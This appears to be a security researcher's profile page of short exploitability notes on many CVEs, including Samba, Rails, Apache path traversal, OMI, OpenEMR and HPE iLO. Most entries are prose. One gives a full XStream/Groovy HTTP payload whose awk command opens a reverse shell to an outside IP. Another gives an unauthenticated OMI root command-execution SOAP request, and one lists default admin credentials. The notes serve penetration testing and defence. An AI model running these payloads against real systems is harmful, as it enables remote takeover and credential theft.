noraj (62)
Last Login: February 28, 2023
noraj's Latest (20) Contributions
Technical Analysis
It has been proven working well on production domains (cf. https://twitter.com/an0n_r0/status/1589405818885398528). kpasswd support is being implemented in impacket and the vuln will be exploitable with ticketer.
Note: this vulnerability concerns Samba AD and not MS AD.
Technical Analysis
This vulnerability is old now and targets old versions of Rails. But if you face such an app it’s really easy to get RCE using an existing PoC. However, editing the YAML manually can be difficult because it’s very space sensitive.
Technical Analysis
It’s easy to get RCE with a Groovy payload. Your code will be executed even if you receive an HTTP 500 error.
Example of request / payload:

POST /createItem?name=example HTTP/1.1
Host: example.org
Content-Length: 689
Content-Type: application/xml;
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="groovy.util.Expando"/>
            <owner class="java.lang.ProcessBuilder">
              <command>
                <string>awk</string>
                <string>'BEGIN {s = "/inet/tcp/0/192.168.1.14/9999"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}'</string>
                <string>/dev/null</string>
              </command>
            </owner>
            <method>start</method>
          </org.codehaus.groovy.runtime.MethodClosure>
        </entry>
      </expandoProperties>
    </groovy.util.Expando>
    <int>1</int>
  </entry>
</map>
Technical Analysis
The only file you can rely on for detection is /WEB-INF/web.xml, but to read something else you’ll have to know the directory structure, which is unlikely when you audit a client infrastructure. To achieve RCE you’ll be required to get file upload, which is also less likely. In many cases in real life it may end up not useful outside proving the vulnerability exists.
There are still some chances you can read /RELEASE-NOTES.txt if you don’t have another means to know the version used.
If the application is deployed under an unguessable path it’s likely you won’t be able to go further, but if you can reach the app and browse it you may be able to understand paths and try to read the source code of the application.
Technical Analysis
IBM Integrated Management Module (IMM) has some default admin credentials (USERID / PASSW0RD). The default credentials are working on the WebUI as well as on telnet and SSH, which are accessible by default. The vulnerability allows injecting system commands. However, the big tradeoff is that the exploit is not public.
Technical Analysis
It gives the GLPI version, the list of all plugins and their versions, and some system info like the database used and its version, sometimes the webserver engine, the PHP version and the list of all PHP modules loaded, the OS distro and version, and the kernel name and version.
Technical Analysis
iTop is a common ITIL software; it gives access to tons of information on the IT department: IP ranges, machine information, support tickets, usernames, it’s often plugged into AD LDAP, etc. Having RCE on the server allows reading configuration files containing LDAP service account credentials, retrieving local users’ password hashes for password spraying, obtaining web admin credentials to access the information gold mine, etc.
Any low privilege account will work for the exploit; in general every employee has an account.
Technical Analysis
It is exposing PII (Personally Identifiable Information) from registered events in the calendar, but also usernames and password hashes for offline cracking.
Technical Analysis
The OMI server receives configuration management messages via the /wsman endpoint. Typically, an Authentication header is passed along with the message and the OMI server will ensure the client is authorized to communicate. In this case the vulnerability is that when there is no Authentication header the server incorrectly accepts the message and executes the instruction under the root user.
By posting an “ExecuteShellCommand” SOAP payload to the server with no Authentication header specified, it will execute the command as root.

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" ...
  <s:Body>
    <p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
      <p:command>id</p:command>
      <p:timeout>0</p:timeout>
    </p:ExecuteShellCommand_INPUT>
  </s:Body>
</s:Envelope>
Technical Analysis
Qualys says:
CVE-2021-42013 was introduced because the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient, as it did not cover double URL encoding; therefore the vulnerable configurations remained the same, but the payload used in 2.4.49 was double URL encoded in 2.4.50 to administer the same path traversal and remote code execution attack.
The attack in 2.4.49 initially encoded the second dot (.) to %2e, and the same was double URL encoded into %%32%65 for version 2.4.50.
Technical Analysis
The prerequisites are important:
- need encryptionKey from typo3conf/LocalConfiguration.php exposed
- need to have and identify a valid deserialization gadget chain (eg. with phpggc)
- need to identify the target PHP version (5.6, 7.2, 7.4, 8.1, etc.?) to be able to serialize the gadget chain so that it is executed correctly; if it is not leaked it may be required to try all major versions manually
so weaponizing is difficult and requires luck and a lot of technical information.
Technical Analysis
IP restriction bypass via the X-REAL-IP HTTP header, then SSRF and RCE on the admin route with LUA code executed via scripts.
Technical Analysis
I found many, many servers, during penetration testing, in corporate environments that have an integrated HPE iLO 4.
It seems the default version of the firmware shipped with the server is 2.50, which makes it vulnerable by default because it’s rarely patched.
Then it’s a matter of seconds to get an administrator account on the iLO.
Technical Analysis
Patch: update to OTRS 6.0.2 to fix this specific issue, but updating to 6.0.32 is recommended.
Technical Analysis
All exploits linked except the gist one have artifacts (3D and \n) making them unusable, so use the gist cleaned version.
To patch update to v2.8+.
Technical Analysis
- Title: OpenEMR < 5.0.1.4 – (Authenticated) File upload – Remote command execution
- Vulnerable version: < 5.0.1.4 (it means up to 5.0.1.3)
- Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485
- Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml
Technical Analysis
- Title: OpenEMR < 5.0.2 – (Authenticated) Path Traversal – Local File Disclosure
- Vulnerable version: < 5.0.2 (it means up to 5.0.1.7)
- Patch: https://github.com/openemr/openemr/pull/2592/files
- Docker PoC: https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml
Technical Analysis
This plugin is not that commonly deployed on Wordpress installations, and to detect it you need the aggressive plugin mode of Wpscan enabled, else wpDiscuz won’t even be detected.
Technical Analysis
The file upload is totally unrestricted, but an account is required.